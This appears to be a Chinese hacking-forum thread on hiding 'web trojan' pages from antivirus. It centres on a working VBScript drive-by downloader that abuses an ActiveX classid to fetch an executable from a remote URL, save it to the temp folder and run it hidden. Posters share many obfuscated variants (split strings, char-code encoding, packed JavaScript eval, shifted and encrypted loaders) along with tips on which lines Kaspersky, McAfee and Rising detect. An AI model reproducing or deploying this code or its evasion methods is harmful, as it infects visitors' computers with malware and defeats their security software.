文章作者：h2k2（_恒 QQ：5454443）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

请看原始代码

复制内容到剪贴板

代码:

<script language="VBScript">
  on error resume next
  dl = "[url]http://www.baidu.com/heng.exe[/url]"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>

请大家看变形后的代码：

复制内容到剪贴板

代码:

<script language="VBScript">
  on error resume next
  xx="object"
  xxx="classid"
  xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  xxxxx="Microsoft.XMLHTTP"
  xxxxxx="GET"
  xxxxxxx="Scripting.FileSystemObject"
  xxxxxxxx="Shell.Application"
  dl = "[url]http://www.baidu.com/heng.exe[/url]"
  Set df = document.createElement(xx)
  df.setAttribute xxx, xxxx
  str=xxxxx
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6=xxxxxx
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject(xxxxxxx,"")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject(xxxxxxxx,"")
  Q.ShellExecute fname1,"","","open",0
  </script>

很容易就发现了，我把“”包含的内容都声明成了变量，然后在代码里直接引用变量就可以了。

复制内容到剪贴板

代码:

a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4

这个还可以变形成这样，

复制内容到剪贴板

代码:

  a1="Ado"
  a2="db."
  a3="Str"
  a4="ea"
  a5="m"
  str1=a1&a2&a3&a4&a5

发现差别了吗？实际上每个字符都可以这样处理，我懒得整而已呵呵。大家自己举一反三吧。

要变形ho~~~，虫虫比较擅长的说～～^_^～～

看看偶变的形·～

复制内容到剪贴板

代码:

<script language=vbscript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
on error resume next
t="100,108,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,98,97,105,100,117,46,99,111,109,47,104,101,110,103,46,101,120,101,34,13,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,115,116,114,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,13,10,97,49,61,34,65,100,111,34,13,10,97,50,61,34,100,98,46,34,13,10,97,51,61,34,83,116,114,34,13,10,97,52,61,34,101,97,109,34,13,10,115,116,114,49,61,97,49,38,97,50,38,97,51,38,97,52,13,10,115,116,114,53,61,115,116,114,49,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,100,108,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,103,48,108,100,46,99,111,109,34,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48"
execute(rechange(t))
</script>

哈哈～～～
那个小工具放在我刚建的小家咯～  http://hi.baidu.com/anuiz
就是懒的去修改那个工具，有中文的时候会出点小问题，把工具里的 asc,chr 改成 ascw,chrw就可以了～
报告完毕。呵呵 [s:37]
欢迎大家批评指教·～～

变形多种多样，眼花了乱啊。现在被杀真是个问题。

虫虫的方法应该算是加密吧~~
    网马免杀，我一直都比较追求不加密，直接改代码就OK，可是有时候好难处理，唉。

纯加密的话会被杀毒软件的文件流检测查到
我在测试的时候，纯加密就遭到KV的查杀。
我换了“Shell.Application”调用组建就不被杀了

不要纯加密哦,我那个工具不是一个成品,你变形后生成的代码如果被杀再稍微一处理就可以了.
这个东西跟我以前发的那个js变形免杀是一样的.

加密的好处在于可以过很多杀毒,但是手工修改就很难做到这点.
我现在基本上只看过不过卡巴,过了卡巴别的就可以不用看了.

用了虫虫的VBS加密器还真不错。俺叫杀虫剂专杀虫虫的。。。 [s:70]  [s:45]  [s:35]

引用:

这里是引用第[6 楼]的虫虫于2006-08-03 08:17发表的：
加密的好处在于可以过很多杀毒,但是手工修改就很难做到这点.
我现在基本上只看过不过卡巴,过了卡巴别的就可以不用看了.

对于网马来说，喀吧好过，我发现咖啡难过。

引用:

这里是引用第[4 楼]的优格于2006-08-03 00:03发表的：
纯加密的话会被杀毒软件的文件流检测查到
我在测试的时候，纯加密就遭到KV的查杀。
我换了“Shell.Application”调用组建就不被杀了

具体说说怎么做的~~

<script language="VBScript">
on error resume next
dl = http://www.163vc.com
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
我死活就是不成功啊.老大们帮看看好吗

其实  "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
改成  "clsid:B"&"D96C55"&"6-65A"&"3-11"&"D0-9"&"83A-"&"00C0"&"4FC"&"29E36" 都可以，也可以过一部分杀毒，但是卡巴就是不放你。
还有变量名也可以改啊，只要别把程序改错了就可以。但是过几天杀毒更新后又可能失败了。
我上面做那个变形好处就在关键字少，修改起来容易。 －－－这是在自卖自夸了，呵呵。

后来觉得，这都是些很肤浅的东西，哎。原来自己也一直这么肤浅，还引以为傲……迷茫～

先转成JS

复制内容到剪贴板

代码:

document.writeln("<html>");
document.writeln(" <script language=\"VBScript\">");
document.writeln("   on error resume next");
document.writeln("   dl = \"http:\/\/www.baidu.com\/go.exe\"");
document.writeln("   Set df = document.createElement(\"object\")");
document.writeln("   df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln("   str=\"Microsoft.XMLHTTP\"");
document.writeln("   Set x = df.CreateObject(str,\"\")");
document.writeln("   a1=\"Ado\"");
document.writeln("   a2=\"db.\"");
document.writeln("   a3=\"Str\"");
document.writeln("   a4=\"eam\"");
document.writeln("   str1=a1&a2&a3&a4");
document.writeln("   str5=str1");
document.writeln("   set S = df.createobject(str5,\"\")");
document.writeln("   S.type = 1");
document.writeln("   str6=\"GET\"");
document.writeln("   x.Open str6, dl, False");
document.writeln("   x.Send");
document.writeln("   fname1=\"Ravwon.exe\"");
document.writeln("   set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln("   set tmp = F.GetSpecialFolder(2) ");
document.writeln("   fname1= F.BuildPath(tmp,fname1)");
document.writeln("   S.open");
document.writeln("   S.write x.responseBody");
document.writeln("   S.savetofile fname1,2");
document.writeln("   S.close");
document.writeln("   set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln("   Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln("   <\/script>");
document.writeln("   <head>");
document.writeln("   <title>fuck all hacker<\/title>");
document.writeln("   <\/head><body>");
document.writeln("  <center><\/center>");
document.writeln("   <\/body><\/html>")

再变形

复制内容到剪贴板

代码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return&#39;\\w+&#39;};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(&#39;\\b&#39;+e(c)+&#39;\\b&#39;,&#39;g&#39;),k[c]);return p;}(&#39;3.4("<p>");3.4(" <m L=\\"M\\">");3.4("   N I J K");3.4("   9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4("   f 5 = 3.R(\\"T\\")");3.4("   5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4("   g=\\"D.E\\"");3.4("   f x = 5.A(g,\\"\\")");3.4("   d=\\"C\\"");3.4("   e=\\"X.\\"");3.4("   j=\\"1b\\"");3.4("   k=\\"1c\\"");3.4("   h=d&e&j&k");3.4("   i=h");3.4("   7 S = 5.8(i,\\"\\")");3.4("   S.1e = 1");3.4("   a=\\"18\\"");3.4("   x.11 a, 9, Y");3.4("   x.Z");3.4("   6=\\"16.c\\"");3.4("   7 F = 5.8(\\"15.13\\",\\"\\")");3.4("   7 b = F.14(2) ");3.4("   6= F.10(b,6)");3.4("   S.n");3.4("   S.1f x.19");3.4("   S.17 6,2");3.4("   S.1a");3.4("   7 Q = 5.8(\\"G.B\\",\\"\\")");3.4("   Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4("   <\\/m>");3.4("   <o>");3.4("   <l>1g 1h 1d<\\/l>");3.4("   <\\/o><q>");3.4("  <r><\\/r>");3.4("   <\\/q><\\/p>")&#39;,62,80,&#39;|||document|writeln|df|fname1|set|createobject|dl|str6|tmp|exe|a1|a2|Set|str|str1|str5|a3|a4|title|script|open|head|html|body|center|65A3|11D0|983A|classid|clsid||BD96C556|00C04FC29E36|CreateObject|Application|Ado|Microsoft|XMLHTTP||Shell|setAttribute|error|resume|next|language|VBScript|on|http|go||createElement||object|www|baidu|com|db|False|Send|BuildPath|Open|ShellExecute|FileSystemObject|GetSpecialFolder|Scripting|Ravwon|savetofile|GET|responseBody|close|Str|eam|hacker|type|write|fuck|all&#39;.split(&#39;|&#39;),0,{}))

过不了内存。。。。郁闷呀！！

1.把每个变量名拆分合并加入垃圾字符 如

引用:

set Q = evil.createobject("Shel"&QQ30039780&RAyH4c&"l.Appl"&"ication","")

2.创建组件的变量顺序也可以乱序.

3.再HTML转JS加密~保证全免杀而且网马就一个JS文件，多方便。

4.干脆重写脚本，参照冰狐以前几个经典的网马脚本.

虫虫,我用你的工具加密后,打开那个网马,IE状态栏会出现"已完毕,但是网页有错误"这是为什么啊

文章作者：瑞星文件不杀，为什么打开网马就提示有病毒呢，请问如何修改？

图片发不起，瑞星这样提示的


病毒名称：Trojan.DL.VBS.Agent.j
进程名称："C:\Program Files\Internet Explorer\iexplore.exe"
文件路径：C:\DOCUME~1\宇\LOCALS~1\Temp\43244250456.tmp

<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm>!=tdsjqu!mbohvbhf>#WCTdsjqu#>!!!!po!fssps!sftvnf!ofy","u!!!!em!>!#iuuq;00xxx/bvl/dp/ls0jodmvef0ifmq0joefy/fyf#!!","!!Tfu!eg!>!epdvnfou/dsfbufFmfnfou)#pckfdu#*!!!!eg/tfuBuusjc","vuf!#dmbttje#-!#dmtje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47#","!!!!tus>#Njdsptpgu/YNMIUUQ#!!!!Tfu!y!>!eg/DsfbufPckfdu)tus-","##*!!!!b2>#Bep#!!!!b3>#ec/#!!!!b4>#Tus#!!!!b5>#fbn#","!!!!tus2>b2&#39;b3&#39;b4&#39;b5!!!!tus6>tus2!!!!tfu!T!>!eg/dsfbufpck","fdu)tus6-##*!!!!T/uzqf!>!2!!!!tus7>#HFU#!!!!y/Pqfo!tus7","-!em-!Gbmtf!!!!y/Tfoe!!!!gobnf2>#h1me/dpn#!!!!tfu!G!>!e","g/dsfbufpckfdu)#Tdsjqujoh/GjmfTztufnPckfdu#-##*!!!!tfu!unq!",">!G/HfuTqfdjbmGpmefs)3*!!!!!gobnf2>!G/CvjmeQbui)unq-gobnf2*","!!!!T/pqfo!!!!T/xsjuf!y/sftqpotfCpez!!!!T/tbwfupgjmf!go","bnf2-3!!!!T/dmptf!!!!tfu!R!>!eg/dsfbufpckfdu)#Tifmm/Bqqmj","dbujpo#-##*!!!!R/TifmmFyfdvuf!gobnf2-##-##-#pqfo#-1!!!!=0","tdsjqu>!!!!=ifbe>!!!!=ujumf>Pi-nz!hpe
!!!Hpmetvo[bu^9","5934825=0ujumf>!!!!=0ifbe>=cpez> =dfoufs>Zpv!EP!ju
=","0dfoufs>!!!!=0cpez>=0iunm>"];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
   i = st.charCodeAt(a);
   if (i==1)
    varS=varS+String.fromCharCode(&#39;"&#39;.charCodeAt()-1);
   else if (i==2) {
    a++;
    varS+=String.fromCharCode(st.charCodeAt(a));
    }
   else
    varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=17;
function S(){
for(i=0;i<num;i++)
  document.write(psw(HtmlStrings));}
S();
// -->
</SCRIPT>

文章作者：瑞星文件不杀，为什么打开网马就提示有病毒呢，请问如何修改？

图片发不起，瑞星这样提示的


病毒名称：Trojan.DL.VBS.Agent.j
进程名称："C:\Program Files\Internet Explorer\iexplore.exe"
文件路径：C:\DOCUME~1\宇\LOCALS~1\Temp\43244250456.tmp


不是木马被杀！木马和网马都是免杀，但是打开链接瑞星就提示有毒。。楼上说的加垃圾代码，垃圾代码怎么写呀？要加是加在哪？

改变一下变量名和调用的组件名,插分开就可以了...
卡巴06的内杀是牛了一点,不过打乱一下代码的顺序就可以了...

麦卡啡只杀 S.savetofile 这句，改下就行了，其它未知

问下。一般网马中都这样的UNICODE%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243。这样的怎么解密呢

这种方法不错,但是变形方法多种多样,转个思路或许能创造出更好的方法!

set Q = df.createobject("Shell.Application","") 这句或者<script language="VBScript"> 这句被杀，该怎么变形哦？

复制内容到剪贴板

代码:

<SCRIPT LANGUAGE="JavaScript">
<!--
function decrypt(str, pwd) {
if(str == null || str.length < 8) {
  alert("A salt value could not be extracted from the encrypted message because it&#39;s length is too short. The message cannot be decrypted.");
  return;
}
if(pwd == null || pwd.length <= 0) {
  alert("Please enter a password with which to decrypt the message.");
  return;
}
var prand = "";
for(var i=0; i<pwd.length; i++) {
  prand += pwd.charCodeAt(i).toString();
}
var sPos = Math.floor(prand.length / 5);
var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos*2) + prand.charAt(sPos*3) + prand.charAt(sPos*4) + prand.charAt(sPos*5));
var incr = Math.round(pwd.length / 2);
var modu = Math.pow(2, 31) - 1;
var salt = parseInt(str.substring(str.length - 8, str.length), 16);
str = str.substring(0, str.length - 8);
prand += salt;
while(prand.length > 10) {
  prand = (parseInt(prand.substring(0, 10)) + parseInt(prand.substring(10, prand.length))).toString();
}
prand = (mult * prand + incr) % modu;
var enc_chr = "";
var enc_str = "";
for(var i=0; i<str.length; i+=2) {
  enc_chr = parseInt(parseInt(str.substring(i, i+2), 16) ^ Math.floor((prand / modu) * 255));
  enc_str += String.fromCharCode(enc_chr);
  prand = (mult * prand + incr) % modu;
}
return enc_str;
}
dl = "[url]http://www2.sjzue.edu.cn/ray.exe[/url]"
var hk="f8d2bf5d24a25ab4f6372cb3b0c34c2a5f73092823fe90b434389704889656e0953ba142ceeb798520db5111b312dc78bf26d6eef7d59aea5054c72d31678733005adf0da15829c4d22d1b3be6e148678a44137f88b051fd8a7931c4b3d87181ec529d457b06db1d03af4e448801e35b1a0f77771bb1f639fa3b9d2d1f8f904dc12fe9875573a55c0b0394c9d310f073bf8a1252f7d66d339c43fec3a34a250eff80e11490abe1311596e60bac42ba238b6acd3758b1178b0d6f025e256df2e52f3192b07a319b36b81d7429765ec24852996170ad13779e26ac88a65beba4d1c85023463e3a08fa7104dc694d0a656362eaaca4a1aa73ec4cbc4286c16a1e523797fa15a4c4f37b93c7909fa708d059e2532dd4d084dc7e10ef211e1ca9ecf692ca62245e4e6ca91cb3cdb473b3f3666be856226fe05aeafec03e7a04f56c6bd6a850df34a65824360f92502ad414281e03de33dc5cc6b5f32f704557dbf2275b0b4c7c597f6aeb8beb0fb43788224e92fcf5c7b5b0c93b0682a29610943d520f8200efa88dc79b6a31d56010a9bfa7e68730479eade14f626aa444ef66d995911a182d81e09614dd09de10c5e068c04213f5eedd692647da57ea7b7ace681bcaa4e7feed3a458f28c114e999444c2393a83e249a73392499f715f8c039e3a3291ae16a14f220b4d41808c852a4a5dbdee2cdaa09d07d2d0ffd496a5367975f401b9332074795cacad48f85a1373ba83d8409f9dadab877cd7d3b45b62a00e2b74b9b39c29898c8b94813cbeccac768bd1c9ae13bce6d9d52496e3b78f5d5a0e20ce31f6d3f3acf50307c4dddb0849287919b35a2fc6f8a3e37f46e0d1a91dd25dc4e67ff8b04a58e05fee0af9200a0e855ae8f3079fc10d24fce28674edc2bfab45f1a2e1850d28df06d66bb6cc39f567a5afcbf14b79044445cb0468ceb458dbab96493858381cd8517959b4cb05f373a3b03db66fa"
document.write(decrypt(hk,&#39;3800&#39;))
//-->
</SCRIPT>

强加密了。嘎嘎。 [s:39]

变量拆分 局部加密  再变量乱序

~HTML TO JS

~最好JS加密

绝对不杀 卖咖啡和一些杀软的那种脚本运行提示除外。